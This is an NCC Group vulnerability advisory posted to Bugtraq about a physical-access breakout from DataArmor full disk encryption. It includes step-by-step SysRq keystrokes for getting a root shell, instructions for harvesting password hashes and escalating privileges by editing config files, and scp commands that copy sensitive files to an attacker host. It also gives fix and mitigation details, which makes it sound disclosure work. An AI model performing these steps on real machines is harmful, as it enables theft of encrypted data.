[<prev] [next>] [day] [month] [year] [list]
Message-ID: <7E45577E4E72EC42BB3F8560D57E755180E838DE@manexchprd01>
Date: Fri, 30 Nov 2012 09:40:48 +0000
From: NCC Group Research <research@...group.com>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: NGS000193 Technical Advisory: DataArmor Full Disk Encryption
Restricted Environment breakout
=======
Summary
=======
Name: DataArmor Full Disk Encryption - Restricted Environment breakout, Privilege Escalation and Full Disk Decryption
Release Date: 30 November 2012
Reference: NGS00193
Discoverer: Stuart Passe <stuart.passe@...secure.com>
Vendor: Mobile Armor
Vendor Reference: KB #1060043
Systems Affected: All versions of DataArmor and DriveArmor prior to v3.0.12.861
Risk: Critical
Status: Published
========
TimeLine
========
Discovered: 10 January 2012
Released: 17 January 2012
Approved: 17 January 2012
Reported: 17 January 2012
Fixed: 23 January 2012
Published: 30 November 2012
===========
Description
===========
The Mobile Armor DataArmor Full Disk Encryption platform allows users to fully encrypt hard drives utilising centralised security policy management.
An issue exists whereby it is possible for unauthenticated users to break out from the restricted DataArmor environment, providing unrestricted administrative access to the underlying platform and associated configuration files.
This allows users to arbitrarily modify both the platform and associated configuration files. Authentication credentials can then be added and/or generated, providing the ability to escalate privileges and gain full access to data stored on the encrypted partition.
=================
Technical Details
=================
The DataArmor software appears to be running under a restricted Linux X11 environment, configured to grab all keystrokes so that special key combinations which might normally be accepted by a Linux Kernel (such as "reboot" [Ctrl+Alt+Del] or "switch TTY" [Ctrl+Alt+{F1-F12}]) are discarded and not acted upon by the underlying Operating System.
It is possible to bypass this keystroke grabbing (through use of the SysRq key), providing the ability to send special commands directly to the Linux Kernel and break-out from the DataArmor environment into the underlying Linux BusyBox Operating System. This subsequently exposes the running DataArmor environment to full manipulation by any user with physical access to the machine, with the possibility of recovering files or fully decrypting the hard disk by unauthorised users.
Technical Details (Proof of Concept)
====================================
Restricted Environment Breakout
-------------------------------
Note: The "SysRq" key is usually located near the "Print Screen" key. On some laptops "SysRq" is accessible only by pressing "Fn". In this case the combination is a bit trickier: hold "Alt", hold "Fn", hold "SysRq", release "Fn", press key.
1. Power on laptop and allow DataArmor software to present authentication screen
2. Send the SIGTERM signal to all processes except init (Alt+SysRq+e), which results in a blank screen being displayed
3. Switch to TTY2 (Ctrl+Alt+F2), which will display a cursor
4. Send the SIGKILL signal to all processes except init (Alt+SysRq+i), which will display the following prompt
5. Press "Return" to activate shell as root
6. Verify that shell is obtained
7. Open an additional TTY (Ctrl+Alt+F3) and press "Return"
8. Verify that the DataArmor "MAAuthenticate" software is not running (ps)
9. Switch back to TTY2 (Ctrl+Alt+F2)
10. Reinitialise the X11 environment (startx)
11. Allow the DataArmor software to fully load
12. Switch the keyboard from RAW mode to XLATE mode (Alt+SysRq+r) to disconnect keyboard from X11 keystroke grabbing
13. Switch back to the additional TTY3 (Ctrl+Alt+F3)
14. Check in the process list that DataArmor is fully running (ps)
At this stage, it is possible to manipulate the DataArmor environment into performing how we wish, allowing for potential full compromise of the laptop and encrypted data. We can view all current local users and hashes (cat /etc/Source/MAData.xml) for offline password-cracking as well as view and modify the local security policy (cat /etc/Source/PolicyFile.xml). This can however be taken a stage further. In addition to viewing the contents of these files, the DataArmor software re-reads the contents of the files when an authentication attempt is made, allowing a user to modify the files within the XFS /etc partition and have the software act accordingly (this can be useful for acts such as modifying the policy to prevent data erase and lockouts after failed password attempts, or change authentication method to local file containing hashes). The following can be performed after step 13 above, with the DataArmor software fully running.
Add User or Escalate Privileges
-------------------------------
Note: Whilst the privilege escalation vulnerability has been proven successfully within the test environment, the ability to successfully add users isn't fully tested at this stage due to uncertainties as to the
method of hash generation. This is purely a time restriction limitation due to short-term access to a DataArmor-enabled laptop, and could be successfully overcome with more time to complete reverse engineering efforts.
1. Navigate to the directory containing configuration files (cd /etc/Source)
2. Open the users file for editing (vi MAData.xml)
3. Add new user and associated hashes to file, making sure to write file (:wq)
4. Alternatively if credentials are known for a standard non-administrative user, edit the file and change the UserType to "1" to escalate privileges to an Administrator (<UserType>1</UserType>)
5. Return to the DataArmor screen running on TTY1 (Ctrl+Alt+F1)
6. Enter new/modified credentials into authentication box
7. Successful authentication presents the user with an additional option to access the Recovery Console (an administrative function)
8. This console gives the user free access to administrative functionality
9. This subsequently allows the user to recover sensitive files from the encrypted partition (such as Windows SAM files and user documents) and transfer them to external media such as a USB stick
10. Alternatively the user can fully decrypt the hard disk, at which point standard techniques for extracting data from the hard disk are applicable
Import/Export DataArmor Environment
-----------------------------------
Alongside fully compromising the running system through modification, the built-in networking capabilities within the Linux BusyBox Operating System mean that all platform files can potentially be moved from the local install to a secondary machine, or vice versa. This allows not only the possibility of extracting the sensitive files for analysis (and potentially cracking) offline in order to gain access to the laptop with existing user credentials, but the ability to transfer files back means that important libraries and executables may be modified on an attacker's machine and then uploaded to the "victim" laptop, potentially fully bypassing the encryption altogether or causing further malicious actions such as logging keystrokes and sending them via network to the attacker in order to capture valid credentials.
1. Switch the keyboard from RAW mode to XLATE mode (Alt+SysRq+r) to disconnect keyboard from X11 keystroke grabbing
2. Switch back to the additional TTY3 (Ctrl+Alt+F3)
3. Verify the currently running iptables ruleset (iptables -L)
4. Change the default rules from "DROP" to "ACCEPT" to allow full network access (vi /etc/iptables.conf)
5. Load modified iptables ruleset (iptables-restore < /etc/iptables.conf)
6. The presence of ssh and scp within the DataArmor environment allows for transferring files either from the victim (scp /etc/Source/sensitive_files attacker@....168.0.1:/tmp/) or to the victim machine (scp attacker@....168.0.1:/tmp/modified_files /etc/Source/)
===============
Fix Information
===============
An updated version of the software has been released to address these vulnerabilities:
http://esupport.trendmicro.com/solution/en-us/1060043.aspx
It is possible to change the configuration parameters whilst the kernel is running by either setting a sysctl parameter (kernel.sysrq = 0) or disabling directly through the /proc filesystem (echo "0" > /proc/sys/kernel/sysrq), however there is a short period of time where the kernel is still vulnerable during the booting process, before the contents of the configuration files are applied.
Due to this small window of vulnerability, the preferred option is to re-compile the Linux Kernel. The SysRq key combination is compiled in to most modern Linux Kernels by default, and to disable this fully, it must be explicitly specified during compilation of the Linux Kernel by modifying the required option (CONFIG_MAGIC_SYSRQ).
Additionally, consideration should be taken to strip down the Linux BusyBox environment in order to remove any potentially unnecessary functionality such as the shell and associated administrative tools (sh, bash, strace, ssh, scp, etc...).
Wikipedia "Magic SysRq Key" - http://en.wikipedia.org/wiki/Magic_SysRq_key
Linux Kernel Documentation - http://kernel.org/doc/Documentation/sysrq.txt
The Linux Documentation Project - http://tldp.org/HOWTO/Remote-Serial-Console-HOWTO/security-sysrq.html
NCC Group Research
http://www.nccgroup.com/research
For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>
Powered by blists - more mailing lists